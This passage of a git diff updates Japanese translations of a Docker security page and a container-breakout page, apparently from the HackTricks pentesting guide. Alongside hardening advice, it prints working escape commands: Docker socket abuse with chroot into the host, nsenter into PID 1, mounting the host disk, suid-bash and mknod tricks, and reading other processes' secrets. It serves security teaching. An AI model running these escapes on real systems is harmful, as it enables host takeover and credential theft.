run -dt --rm denial sleep 1234 #Run a large sleep inside a Debian contain ps -ef | grep 1234 #Get info about the sleep process ls -l /proc//ns #Get the Group and the namespaces (some may be uniq to the hosts and some may be shred with it) ``` +詳細については、次を確認してください: + {{#ref}} cgroups.md {{#endref}} ### Capabilities -Capabilitiesは、**rootユーザーに許可される能力をより細かく制御する**ことを可能にします。DockerはLinuxカーネルの能力機能を使用して、**ユーザーの種類に関係なく、コンテナ内で実行できる操作を制限します**。 +Capabilitiesは、**rootユーザーに許可される能力をより細かく制御する**ことを可能にします。Dockerは、**ユーザーの種類に関係なく、コンテナ内で実行できる操作を制限するためにLinuxカーネルの能力機能を使用します**。 Dockerコンテナが実行されると、**プロセスは隔離から脱出するために使用できる敏感な能力を放棄します**。これは、プロセスが敏感なアクションを実行し、脱出できないことを保証しようとします: @@ -182,7 +184,7 @@ seccomp.md ### AppArmor in Docker -**AppArmor**は、**コンテナ**を**限られた**リソースの**セット**に制限するためのカーネル拡張です。**プログラムごとのプロファイル**を持っています。 +**AppArmor**は、**コンテナ**を**限られた**リソースの**セット**に制限するためのカーネル拡張です。**プログラムごとのプロファイル**を持っています: {{#ref}} apparmor.md @@ -191,7 +193,7 @@ apparmor.md ### SELinux in Docker - **ラベリングシステム**: SELinuxは、すべてのプロセスとファイルシステムオブジェクトに一意のラベルを割り当てます。 -- **ポリシーの強制**: プロセスラベルがシステム内の他のラベルに対してどのようなアクションを実行できるかを定義するセキュリティポリシーを強制します。 +- **ポリシーの強制**: プロセスラベルがシステム内の他のラベルに対してどのアクションを実行できるかを定義するセキュリティポリシーを強制します。 - **コンテナプロセスラベル**: コンテナエンジンがコンテナプロセスを開始するとき、通常は制限されたSELinuxラベル、一般的に`container_t`が割り当てられます。 - **コンテナ内のファイルラベリング**: コンテナ内のファイルは通常`container_file_t`としてラベル付けされます。 - **ポリシールール**: SELinuxポリシーは、`container_t`ラベルを持つプロセスが`container_file_t`としてラベル付けされたファイルとのみ相互作用(読み取り、書き込み、実行)できることを主に保証します。 @@ -206,7 +208,7 @@ apparmor.md Dockerでは、認可プラグインがセキュリティにおいて重要な役割を果たし、Dockerデーモンへのリクエストを許可またはブロックするかを決定します。この決定は、2つの重要なコンテキストを調べることによって行われます: -- **認証コンテキスト**: これには、ユーザーが誰であるか、どのように認証されたかなど、ユーザーに関する包括的な情報が含まれます。 +- **認証コンテキスト**: これには、ユーザーが誰であるか、どのように認証されたかに関する包括的な情報が含まれます。 - **コマンドコンテキスト**: これには、行われているリクエストに関連するすべての重要なデータが含まれます。 これらのコンテキストは、認証されたユーザーからの正当なリクエストのみが処理されることを保証し、Docker操作のセキュリティを強化します。 @@ -215,7 +217,7 @@ Dockerでは、認可プラグインがセキュリティにおいて重要な authz-and-authn-docker-access-authorization-plugin.md {{#endref}} -## DoS from a container +## コンテナからのDoS コンテナが使用できるリソースを適切に制限していない場合、侵害されたコンテナが実行されているホストにDoSを引き起こす可能性があります。 @@ -245,9 +247,9 @@ docker-privileged.md #### no-new-privileges -攻撃者が低い権限のユーザーとしてアクセスを得ることができるコンテナを実行している場合、**誤って設定されたsuidバイナリ**があると、攻撃者はそれを悪用して**コンテナ内で権限を昇格させる**可能性があります。これにより、彼はコンテナから脱出できるかもしれません。 +攻撃者が低特権ユーザーとしてアクセスを得ることができるコンテナを実行している場合、**誤って設定されたsuidバイナリ**があると、攻撃者はそれを悪用し、**コンテナ内で特権を昇格させる**可能性があります。これにより、彼はコンテナから脱出できるかもしれません。 -**`no-new-privileges`**オプションを有効にしてコンテナを実行すると、この種の権限昇格を**防ぐことができます**。 +**`no-new-privileges`**オプションを有効にしてコンテナを実行すると、この種の特権昇格を**防ぐことができます**。 ``` docker run -it --security-opt=no-new-privileges:true nonewpriv ``` @@ -274,9 +276,9 @@ For more **`--security-opt`** options check: [https://docs.docker.com/engine/ref シークレットをDockerイメージに直接埋め込んだり、環境変数を使用したりすることは避けることが重要です。これらの方法は、`docker inspect`や`exec`のようなコマンドを通じてコンテナにアクセスできる誰にでも機密情報を露出させてしまいます。 -**Dockerボリューム**は、機密情報にアクセスするためのより安全な代替手段です。これらはメモリ内の一時ファイルシステムとして利用でき、`docker inspect`やログに関連するリスクを軽減します。ただし、ルートユーザーやコンテナへの`exec`アクセスを持つ者は、依然としてシークレットにアクセスできる可能性があります。 +**Dockerボリューム**は、機密情報にアクセスするためのより安全な代替手段です。これらはメモリ内の一時ファイルシステムとして利用でき、`docker inspect`やログに関連するリスクを軽減します。ただし、rootユーザーやコンテナへの`exec`アクセスを持つユーザーは、依然としてシークレットにアクセスできる可能性があります。 -**Dockerシークレット**は、機密情報を扱うためのさらに安全な方法を提供します。イメージビルドフェーズ中にシークレットが必要なインスタンスの場合、**BuildKit**はビルド時のシークレットをサポートし、ビルド速度を向上させ、追加機能を提供する効率的なソリューションを提供します。 +**Dockerシークレット**は、機密情報を扱うためのさらに安全な方法を提供します。イメージビルドフェーズ中にシークレットが必要なインスタンスには、**BuildKit**がビルド時のシークレットをサポートし、ビルド速度を向上させ、追加機能を提供する効率的なソリューションを提供します。 BuildKitを活用するには、以下の3つの方法で有効化できます: @@ -284,7 +286,7 @@ BuildKitを活用するには、以下の3つの方法で有効化できます 2. コマンドにプレフィックスを付けて: `DOCKER_BUILDKIT=1 docker build .` 3. Docker設定でデフォルトで有効にする: `{ "features": { "buildkit": true } }`、その後Dockerを再起動します。 -BuildKitは、`--secret`オプションを使用してビルド時のシークレットを利用でき、これらのシークレットがイメージビルドキャッシュや最終イメージに含まれないようにします。コマンドの例: +BuildKitは、`--secret`オプションを使用してビルド時のシークレットを利用できるようにし、これらのシークレットがイメージビルドキャッシュや最終イメージに含まれないようにします。コマンドの例は次の通りです: ```bash docker build --secret my_key=my_value ,src=path/to/my_secret_file . ``` @@ -307,7 +309,7 @@ Kubernetes環境では、シークレットがネイティブにサポートさ ### gVisor -**gVisor**は、Goで書かれたアプリケーションカーネルで、Linuxシステムの表面の大部分を実装しています。これは、アプリケーションとホストカーネルの間に**隔離境界**を提供する`runsc`という[Open Container Initiative (OCI)](https://www.opencontainers.org)ランタイムを含んでいます。`runsc`ランタイムはDockerとKubernetesと統合されており、サンドボックス化されたコンテナを簡単に実行できます。 +**gVisor**は、Goで書かれたアプリケーションカーネルで、Linuxシステムの表面の大部分を実装しています。アプリケーションとホストカーネルの間に**隔離境界**を提供する`runsc`という[Open Container Initiative (OCI)](https://www.opencontainers.org)ランタイムを含んでいます。`runsc`ランタイムはDockerとKubernetesと統合されており、サンドボックス化されたコンテナを簡単に実行できます。 {{#ref}} https://github.com/google/gvisor @@ -315,7 +317,7 @@ https://github.com/google/gvisor ### Kata Containers -**Kata Containers**は、軽量の仮想マシンを使用して安全なコンテナランタイムを構築するために活動しているオープンソースコミュニティです。これにより、コンテナのように感じられ、動作しますが、**ハードウェア仮想化**技術を使用して、より強力なワークロードの隔離を提供します。 +**Kata Containers**は、軽量の仮想マシンを使用して安全なコンテナランタイムを構築するために活動しているオープンソースコミュニティです。これにより、コンテナのように感じられ、動作しますが、**ハードウェア仮想化**技術を使用してより強力なワークロードの隔離を提供します。 {{#ref}} https://katacontainers.io/ @@ -323,20 +325,20 @@ https://katacontainers.io/ ### まとめのヒント -- **`--privileged`フラグを使用したり、** [**Dockerソケットをコンテナ内にマウントしないでください**](https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/)**。** Dockerソケットはコンテナを生成することを可能にするため、例えば`--privileged`フラグを使用して別のコンテナを実行することで、ホストを完全に制御する簡単な方法です。 -- **コンテナ内でrootとして実行しないでください。** [**異なるユーザーを使用し**](https://docs.docker.com/develop/develop-images/dockerfile_best-practices/#user) **、** [**ユーザー名前空間を使用してください**](https://docs.docker.com/engine/security/userns-remap/)**。** コンテナ内のrootは、ユーザー名前空間で再マップされない限り、ホストのrootと同じです。主にLinuxの名前空間、機能、cgroupsによって軽く制限されています。 -- [**すべての機能を削除**](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities) **(`--cap-drop=all`)し、必要なものだけを有効にしてください** (`--cap-add=...`)。多くのワークロードは機能を必要とせず、追加すると潜在的な攻撃の範囲が広がります。 -- [**“no-new-privileges”セキュリティオプションを使用**](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/) **して、プロセスがより多くの特権を取得するのを防ぎます。** 例えば、suidバイナリを通じて。 -- [**コンテナに利用可能なリソースを制限**](https://docs.docker.com/engine/reference/run/#runtime-constraints-on-resources)**。** リソース制限は、サービス拒否攻撃からマシンを保護できます。 -- **seccomp** [**、AppArmor**](https://docs.docker.com/engine/security/apparmor/) **(またはSELinux)**プロファイルを調整して、コンテナに必要な最小限のアクションとシステムコールを制限します。 -- **公式のdockerイメージを使用し** [**、署名を要求**](https://docs.docker.com/docker-hub/official_images/) **するか、それに基づいて自分のものを構築してください。** バックドア付きの[**イメージを継承したり使用したりしないでください**](https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/)。また、ルートキーやパスフレーズを安全な場所に保管してください。DockerはUCPでキーを管理する計画があります。 -- **定期的に** **イメージを再構築して、** **ホストとイメージにセキュリティパッチを適用します。** -- **シークレットを賢く管理**して、攻撃者がアクセスしにくくします。 -- Dockerデーモンを**公開する場合は、HTTPSを使用**し、クライアントとサーバーの認証を行います。 -- Dockerfileでは、**ADDの代わりにCOPYを優先してください**。ADDは自動的に圧縮ファイルを抽出し、URLからファイルをコピーできます。COPYにはこれらの機能がありません。可能な限りADDの使用を避け、リモートURLやZipファイルを通じた攻撃に対して脆弱にならないようにします。 -- **各マイクロサービスに対して別々のコンテナを持つ** -- **コンテナ内にsshを置かない**でください。「docker exec」を使用してコンテナにsshできます。 -- **より小さな**コンテナ**イメージを持つ** +- **`--privileged`フラグを使用したり、** [**Dockerソケットをコンテナ内にマウントしないでください**](https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/)**。** Dockerソケットはコンテナを生成することを可能にするため、例えば`--privileged`フラグを使用して別のコンテナを実行することでホストを完全に制御する簡単な方法です。 +- **コンテナ内でrootとして実行しないでください。** [**異なるユーザーを使用し**](https://docs.docker.com/develop/develop-images/dockerfile_best-practices/#user) **、** [**ユーザー名前空間を使用してください**](https://docs.docker.com/engine/security/userns-remap/)**。** コンテナ内のrootは、ユーザー名前空間で再マップされない限り、ホストのrootと同じです。主にLinuxの名前空間、能力、cgroupsによって軽く制限されています。 +- [**すべての能力を削除**](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities) **(`--cap-drop=all`)し、必要なものだけを有効にしてください** (`--cap-add=...`)。多くのワークロードは能力を必要とせず、それを追加すると潜在的な攻撃の範囲が広がります。 +- [**“no-new-privileges”セキュリティオプションを使用してください**](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/) **。** これにより、プロセスがsuidバイナリを通じてより多くの特権を得ることを防ぎます。 +- [**コンテナに利用可能なリソースを制限してください**](https://docs.docker.com/engine/reference/run/#runtime-constraints-on-resources)**。** リソース制限は、サービス拒否攻撃からマシンを保護できます。 +- **seccomp** [**、AppArmor**](https://docs.docker.com/engine/security/apparmor/) **(またはSELinux)プロファイルを調整して、コンテナに必要な最小限のアクションとシステムコールを制限してください。** +- **公式のdockerイメージを使用し** [**、署名を要求してください**](https://docs.docker.com/docker-hub/official_images/) **、またはそれに基づいて自分のものを構築してください。** バックドア付きのイメージを継承したり使用したりしないでください。ルートキーやパスフレーズは安全な場所に保管してください。DockerはUCPでキーを管理する計画を持っています。 +- **定期的に** **イメージを再構築して、ホストとイメージにセキュリティパッチを適用してください。** +- **シークレットを賢く管理し**、攻撃者がアクセスするのを難しくしてください。 +- **Dockerデーモンを公開する場合は、クライアントとサーバーの認証を使用してHTTPSを使用してください。** +- Dockerfileでは、**ADDの代わりにCOPYを優先してください。** ADDは自動的に圧縮ファイルを抽出し、URLからファイルをコピーできます。COPYにはこれらの機能がありません。可能な限りADDの使用を避け、リモートURLやZipファイルを通じた攻撃に対して脆弱にならないようにしてください。 +- **各マイクロサービスに対して別々のコンテナを持ってください。** +- **コンテナ内にsshを置かないでください。** “docker exec”を使用してコンテナにsshできます。 +- **より小さな**コンテナ**イメージを持ってください。** ## Dockerブレイクアウト / 特権昇格 @@ -356,7 +358,7 @@ authz-and-authn-docker-access-authorization-plugin.md ## Dockerの強化 -- ツール[**docker-bench-security**](https://github.com/docker/docker-bench-security)は、プロダクションでDockerコンテナを展開する際の一般的なベストプラクティスをチェックするスクリプトです。テストはすべて自動化されており、[CIS Docker Benchmark v1.3.1](https://www.cisecurity.org/benchmark/docker/)に基づいています。\ +- ツール[**docker-bench-security**](https://github.com/docker/docker-bench-security)は、Dockerコンテナを本番環境で展開する際の一般的なベストプラクティスをチェックするスクリプトです。テストはすべて自動化されており、[CIS Docker Benchmark v1.3.1](https://www.cisecurity.org/benchmark/docker/)に基づいています。\ このツールは、dockerを実行しているホストまたは十分な特権を持つコンテナから実行する必要があります。**READMEでの実行方法を確認してください:** [**https://github.com/docker/docker-bench-security**](https://github.com/docker/docker-bench-security)。 ## 参考文献 diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md index 31f4bc709..f714c88d4 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md +++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md @@ -5,10 +5,10 @@ ## 自動列挙とエスケープ - [**linpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS): コンテナを**列挙**することもできます -- [**CDK**](https://github.com/cdk-team/CDK#installationdelivery): このツールは、コンテナを列挙し、自動的にエスケープを試みるのに非常に**便利**です +- [**CDK**](https://github.com/cdk-team/CDK#installationdelivery): このツールは、あなたがいるコンテナを**列挙**し、自動的にエスケープを試みるのに非常に**便利**です - [**amicontained**](https://github.com/genuinetools/amicontained): コンテナが持つ権限を取得し、そこからエスケープする方法を見つけるのに役立つツール - [**deepce**](https://github.com/stealthcopter/deepce): コンテナから列挙し、エスケープするためのツール -- [**grype**](https://github.com/anchore/grype): イメージにインストールされているソフトウェアに含まれるCVEを取得します +- [**grype**](https://github.com/anchore/grype): 画像にインストールされているソフトウェアに含まれるCVEを取得します ## マウントされたDockerソケットエスケープ @@ -19,7 +19,7 @@ find / -name docker.sock 2>/dev/null #It's usually in /run/docker.sock ``` -この場合、通常のdockerコマンドを使用してdockerデーモンと通信できます: +この場合、通常のdockerコマンドを使用してdockerデーモンと通信できます: ```bash #List images to use one docker images @@ -33,12 +33,12 @@ nsenter --target 1 --mount --uts --ipc --net --pid -- bash # Get full privs in container without --privileged docker run -it -v /:/host/ --cap-add=ALL --security-opt apparmor=unconfined --security-opt seccomp=unconfined --security-opt label:disable --pid=host --userns=host --uts=host --cgroupns=host ubuntu chroot /host/ bash ``` -> [!NOTE] -> **dockerソケットが予期しない場所にある場合**でも、**`docker`**コマンドを使用して、パラメータ**`-H unix:///path/to/docker.sock`**で通信できます。 +> [!TIP] +> **docker socketが予期しない場所にある場合**でも、**`docker`**コマンドを使用して、パラメータ**`-H unix:///path/to/docker.sock`**で通信できます。 -Dockerデーモンは、[ポートでリッスンしている可能性があります(デフォルトは2375、2376)](../../../../network-services-pentesting/2375-pentesting-docker.md) または、Systemdベースのシステムでは、Systemdソケット`fd://`を介してDockerデーモンと通信できます。 +Dockerデーモンは、[ポートでリッスンしている場合もあります(デフォルトは2375、2376)](../../../../network-services-pentesting/2375-pentesting-docker.md) または、Systemdベースのシステムでは、Systemdソケット`fd://`を介してDockerデーモンと通信できます。 -> [!NOTE] +> [!TIP] > さらに、他の高レベルランタイムのランタイムソケットにも注意してください: > > - dockershim: `unix:///var/run/dockershim.sock` @@ -52,11 +52,11 @@ Dockerデーモンは、[ポートでリッスンしている可能性があり コンテナの能力を確認する必要があります。以下のいずれかを持っている場合、そこから脱出できる可能性があります:**`CAP_SYS_ADMIN`**、**`CAP_SYS_PTRACE`**、**`CAP_SYS_MODULE`**、**`DAC_READ_SEARCH`**、**`DAC_OVERRIDE`、`CAP_SYS_RAWIO`、`CAP_SYSLOG`、`CAP_NET_RAW`、`CAP_NET_ADMIN`** -現在のコンテナの能力は、**前述の自動ツール**を使用して確認するか: +現在のコンテナの能力は、**前述の自動ツール**を使用するか、次の方法で確認できます: ```bash capsh --print ``` -以下のページでは、**Linuxの能力**について学び、それを悪用して特権を逃れたり昇格させたりする方法を学ぶことができます: +以下のページでは、**Linuxの能力について詳しく学び**、それを悪用して特権を逃れたり昇格させたりする方法を学ぶことができます: {{#ref}} ../../linux-capabilities.md @@ -84,9 +84,9 @@ capsh --print ### 特権 + hostPID -これらの権限を使用すると、単に**ホストでrootとして実行されているプロセスの名前空間に移動する**ことができます。例えば、init (pid:1) に対して、次のコマンドを実行します: `nsenter --target 1 --mount --uts --ipc --net --pid -- bash` +これらの権限を使用すると、単に**ホストでルートとして実行されているプロセスの名前空間に移動**することができます。例えば、init (pid:1) に対して、次のコマンドを実行します:`nsenter --target 1 --mount --uts --ipc --net --pid -- bash` -コンテナ内で次のようにテストします: +コンテナ内で次のようにテストしてください: ```bash docker run --rm -it --pid=host --privileged ubuntu bash ``` @@ -104,7 +104,7 @@ docker run --rm -it --privileged ubuntu bash ![](https://bestestredteam.com/content/images/2019/08/image-16.png) -したがって、ホストマシンを乗っ取るのは簡単です: +したがって、ホストマシンを乗っ取ることは簡単です: ```bash mkdir -p /mnt/hola mount /dev/sda1 /mnt/hola @@ -113,7 +113,7 @@ mount /dev/sda1 /mnt/hola #### ディスクのマウント - Poc2 -コンテナ内で、攻撃者はクラスターによって作成された書き込み可能な hostPath ボリュームを介して、基盤となるホスト OS へのさらなるアクセスを試みることがあります。以下は、この攻撃者ベクターを利用できるかどうかを確認するためにコンテナ内でチェックできる一般的な項目です: +コンテナ内で、攻撃者はクラスターによって作成された書き込み可能な hostPath ボリュームを介して、基盤となるホスト OS へのさらなるアクセスを試みるかもしれません。以下は、この攻撃者ベクターを利用できるかどうかを確認するためにコンテナ内でチェックできる一般的な項目です: ```bash ### Check if You Can Write to a File-system echo 1 > /proc/sysrq-trigger @@ -216,7 +216,7 @@ docker-release_agent-cgroups-escape.md #### 特権エスケープ release_agentを相対パスを知らずに悪用する - PoC3 -前のエクスプロイトでは、**ホストのファイルシステム内のコンテナの絶対パスが開示されます**。しかし、これは常にそうではありません。ホスト内のコンテナの**絶対パスがわからない場合**は、この技術を使用できます: +前のエクスプロイトでは、**ホストのファイルシステム内のコンテナの絶対パスが開示されます**。しかし、これは常に当てはまるわけではありません。ホスト内のコンテナの**絶対パスがわからない場合**は、この技術を使用できます: {{#ref}} release_agent-exploit-relative-paths-to-pids.md @@ -310,8 +310,8 @@ root 10 2 0 11:25 ? 00:00:00 [ksoftirqd/0] ``` #### 特権エスケープ:センシティブマウントの悪用 -マウントされる可能性のあるいくつかのファイルがあり、これらは**基盤となるホストに関する情報**を提供します。中には、**何かが発生したときにホストによって実行されるべき何かを示す**ものもあります(これにより攻撃者はコンテナからエスケープすることが可能になります)。\ -これらのファイルの悪用により、以下が可能になる場合があります: +マウントされる可能性のあるファイルがいくつかあり、これらは**基盤となるホストに関する情報**を提供します。中には、**何かが発生したときにホストによって実行されるべき何か**を示すものもあります(これにより攻撃者はコンテナからエスケープすることが可能になります)。\ +これらのファイルの悪用により、以下のことが可能になる場合があります: - release_agent(以前に説明済み) - [binfmt_misc](sensitive-mounts.md#proc-sys-fs-binfmt_misc) @@ -327,14 +327,16 @@ sensitive-mounts.md ### 任意のマウント -いくつかの状況では、**コンテナがホストからいくつかのボリュームをマウントしている**ことがわかります。このボリュームが正しく構成されていない場合、**センシティブデータにアクセス/変更することができる**かもしれません:秘密情報を読み取る、ssh authorized_keysを変更する… +いくつかの状況では、**コンテナがホストからいくつかのボリュームをマウントしている**ことがわかります。このボリュームが正しく構成されていない場合、**センシティブデータにアクセス/変更することができる**かもしれません:秘密情報を読み取ったり、sshのauthorized_keysを変更したり… ```bash docker run --rm -it -v /:/host ubuntu bash ``` +別の興味深い例は[**このブログ**](https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce)に見られ、ホストの`/usr/bin/`および`/bin/`フォルダーがコンテナ内にマウントされているため、コンテナのルートユーザーがこれらのフォルダー内のバイナリを変更できることが示されています。したがって、cronジョブがそこからのバイナリを使用している場合、例えば`/etc/cron.d/popularity-contest`のように、cronジョブによって使用されるバイナリを変更することでコンテナから脱出することができます。 + ### 2つのシェルとホストマウントを使用した特権昇格 -**コンテナ内でrootとしてアクセス**でき、ホストからマウントされたフォルダがあり、**非特権ユーザーとしてホストにエスケープ**し、マウントされたフォルダに対する読み取りアクセスがある場合。\ -**コンテナ**内の**マウントされたフォルダ**に**bash suidファイル**を作成し、**ホストから実行**して特権昇格を行うことができます。 +ホストからマウントされたフォルダーを持つ**コンテナ内のrootとしてアクセス**があり、**非特権ユーザーとしてホストに脱出**し、マウントされたフォルダーに対する読み取りアクセスがある場合、\ +**コンテナ内のマウントされたフォルダー**に**bash suidファイル**を作成し、**ホストから実行**して特権昇格を行うことができます。 ```bash cp /bin/bash . #From non priv inside mounted folder # You need to copy it from the host as the bash binaries might be diferent in the host and in the container @@ -342,14 +344,14 @@ chown root:root bash #From container as root inside mounted folder chmod 4777 bash #From container as root inside mounted folder bash -p #From non priv inside mounted folder ``` -### 2つのシェルを使った特権昇格 +### 特権昇格と2つのシェル -**コンテナ内でrootとしてアクセスでき**、**非特権ユーザーとしてホストにエスケープした**場合、コンテナ内でMKNODの権限があれば(デフォルトで持っています)、両方のシェルを利用して**ホスト内での特権昇格を行う**ことができます([**この投稿で説明されています**](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/))。\ -このような権限を持つと、コンテナ内のrootユーザーは**ブロックデバイスファイルを作成する**ことが許可されます。デバイスファイルは、**基盤となるハードウェアやカーネルモジュールにアクセスするために使用される特別なファイル**です。例えば、/dev/sdaブロックデバイスファイルは、**システムディスク上の生データを読み取る**ためのアクセスを提供します。 +**コンテナ内でrootとしてアクセスでき**、**非特権ユーザーとしてホストにエスケープした**場合、コンテナ内でMKNODの権限がある限り(デフォルトで持っています)、両方のシェルを利用して**ホスト内での特権昇格**を行うことができます(詳細は[**この投稿**](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/)を参照)。\ +この権限を持つことで、コンテナ内のrootユーザーは**ブロックデバイスファイルを作成**することが許可されます。デバイスファイルは、**基盤となるハードウェアやカーネルモジュールにアクセスするために使用される特別なファイル**です。例えば、/dev/sdaのブロックデバイスファイルは、**システムディスク上の生データを読み取る**ためのアクセスを提供します。 Dockerは、コンテナ内でのブロックデバイスの誤用を防ぐために、**ブロックデバイスの読み書き操作をブロックする**cgroupポリシーを強制しています。それにもかかわらず、ブロックデバイスが**コンテナ内で作成されると**、それは**/proc/PID/root/**ディレクトリを介してコンテナの外部からアクセス可能になります。このアクセスには、**プロセスの所有者がコンテナ内外で同じである必要があります**。 -**悪用**の例は、[**この書き込み**](https://radboudinstituteof.pwning.nl/posts/htbunictfquals2021/goodgames/)からです: +**悪用**の例は、[**この書き込み**](https://radboudinstituteof.pwning.nl/posts/htbunictfquals2021/goodgames/)からのものです: ```bash # On the container as root cd / @@ -387,7 +389,7 @@ HTB{7h4T_w45_Tr1cKy_1_D4r3_54y} ``` ### hostPID -ホストのプロセスにアクセスできる場合、それらのプロセスに保存されている多くの機密情報にアクセスできるようになります。テストラボを実行します: +ホストのプロセスにアクセスできる場合、そのプロセスに保存されている多くの機密情報にアクセスできるようになります。テストラボを実行してください: ``` docker run --rm -it --pid=host ubuntu bash ``` @@ -402,7 +404,7 @@ HOSTNAME=argocd-server-69678b4f65-6mmql USER=abrgocd ... ``` -他のプロセスのファイルディスクリプタに**アクセスして、オープンファイルを読み取る**こともできます。 +他のプロセスのファイルディスクリプタに**アクセスして、オープンしているファイルを読み取る**こともできます。 ```bash for fd in `find /proc/*/fd`; do ls -al $fd/* 2>/dev/null | grep \>; done > fds.txt less fds.txt @@ -415,13 +417,13 @@ cat /proc/635813/fd/4 プロセスを**終了させてDoSを引き起こす**こともできます。 > [!WARNING] -> もし何らかの方法で**コンテナ外のプロセスに対して特権アクセス**を持っている場合、`nsenter --target --all`や`nsenter --target --mount --net --pid --cgroup`のようなコマンドを実行して、そのプロセスと**同じns制限**(できれば制限なし)で**シェルを実行**することができます。 +> もしコンテナの外部でプロセスに対して特権**アクセスを持っている場合**、`nsenter --target --all`や`nsenter --target --mount --net --pid --cgroup`のようなコマンドを実行して、そのプロセスと**同じns制限**(できればなし)で**シェルを実行**することができます。 ### hostNetwork ``` docker run --rm -it --network=host ubuntu bash ``` -コンテナがDocker [ホストネットワーキングドライバー (`--network=host`)](https://docs.docker.com/network/host/) で構成されている場合、そのコンテナのネットワークスタックはDockerホストから隔離されておらず(コンテナはホストのネットワーキングネームスペースを共有)、コンテナには独自のIPアドレスが割り当てられません。言い換えれば、**コンテナはすべてのサービスをホストのIPに直接バインドします**。さらに、コンテナは**ホストが送受信しているすべてのネットワークトラフィックを傍受することができます**。共有インターフェース `tcpdump -i eth0` で。 +コンテナがDocker [ホストネットワーキングドライバー(`--network=host`)](https://docs.docker.com/network/host/) で構成されている場合、そのコンテナのネットワークスタックはDockerホストから隔離されておらず(コンテナはホストのネットワーキングネームスペースを共有します)、コンテナには独自のIPアドレスが割り当てられません。言い換えれば、**コンテナはすべてのサービスをホストのIPに直接バインドします**。さらに、コンテナは**ホストが送受信しているすべてのネットワークトラフィックを傍受することができます**。共有インターフェース `tcpdump -i eth0` を使用します。 例えば、これを使用して**ホストとメタデータインスタンス間のトラフィックを傍受し、さらには偽装する**ことができます。 @@ -430,20 +432,20 @@ docker run --rm -it --network=host ubuntu bash - [Writeup: How to contact Google SRE: Dropping a shell in cloud SQL](https://offensi.com/2020/08/18/how-to-contact-google-sre-dropping-a-shell-in-cloud-sql/) - [Metadata service MITM allows root privilege escalation (EKS / GKE)](https://blog.champtar.fr/Metadata_MITM_root_EKS_GKE/) -また、ホスト内の**localhostにバインドされたネットワークサービス**にアクセスしたり、**ノードのメタデータ権限**(コンテナがアクセスできるものとは異なる場合があります)にアクセスすることもできます。 +ホスト内の**localhostにバインドされたネットワークサービス**にもアクセスできるようになり、さらには**ノードのメタデータ権限**(コンテナがアクセスできるものとは異なる場合があります)にもアクセスできます。 ### hostIPC ```bash docker run --rm -it --ipc=host ubuntu bash ``` -`hostIPC=true`を設定すると、ホストのプロセス間通信(IPC)リソース、例えば`/dev/shm`の**共有メモリ**にアクセスできます。これにより、他のホストやポッドプロセスが使用する同じIPCリソースに対して読み書きが可能になります。これらのIPCメカニズムをさらに調査するには、`ipcs`を使用してください。 +`hostIPC=true`を設定すると、ホストのプロセス間通信(IPC)リソース、例えば`/dev/shm`の**共有メモリ**にアクセスできます。これにより、他のホストやポッドプロセスが使用している同じIPCリソースに対して読み書きが可能になります。これらのIPCメカニズムをさらに調査するには、`ipcs`を使用してください。 - **/dev/shmを調査** - この共有メモリの場所にあるファイルを探します: `ls -la /dev/shm` -- **既存のIPC施設を調査** – `/usr/bin/ipcs`を使用して、IPC施設が使用されているか確認できます。次のコマンドで確認してください: `ipcs -a` +- **既存のIPC施設を調査** – `/usr/bin/ipcs`を使用して、使用中のIPC施設があるか確認できます。次のコマンドで確認してください: `ipcs -a` -### 権限の回復 +### 権限を回復する -もしシステムコール**`unshare`**が禁止されていなければ、すべての権限を回復できます: +もしシステムコール**`unshare`**が禁止されていなければ、次のコマンドを実行してすべての権限を回復できます: ```bash unshare -UrmCpf bash # Check them with @@ -466,16 +468,16 @@ cat /proc/self/status | grep CapEff これにより、main.goファイルに存在するペイロードがトリガーされます。 -詳細については、[https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html)を参照してください。 +詳細については、[https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html)をご覧ください。 -> [!NOTE] -> コンテナが脆弱である可能性のある他のCVEもあります。リストは[https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list)で確認できます。 +> [!TIP] +> コンテナが脆弱である可能性のある他のCVEもあります。リストは[https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list)で見つけることができます。 ## Dockerカスタムエスケープ ### Dockerエスケープサーフェス -- **名前空間:** プロセスは名前空間を介して**他のプロセスから完全に分離されるべき**であり、名前空間のために他のプロセスと相互作用してエスケープすることはできません(デフォルトでは、IPC、Unixソケット、ネットワークサービス、D-Bus、他のプロセスの`/proc`を介して通信できません)。 +- **名前空間:** プロセスは名前空間を介して**他のプロセスから完全に分離されるべき**であり、デフォルトではIPC、Unixソケット、ネットワークサービス、D-Bus、他のプロセスの`/proc`を介して通信できません。 - **ルートユーザー**: デフォルトでは、プロセスを実行しているユーザーはルートユーザーです(ただし、その特権は制限されています)。 - **能力**: Dockerは以下の能力を残します: `cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep` - **システムコール**: これらは**ルートユーザーが呼び出すことができない**システムコールです(能力が不足しているため + 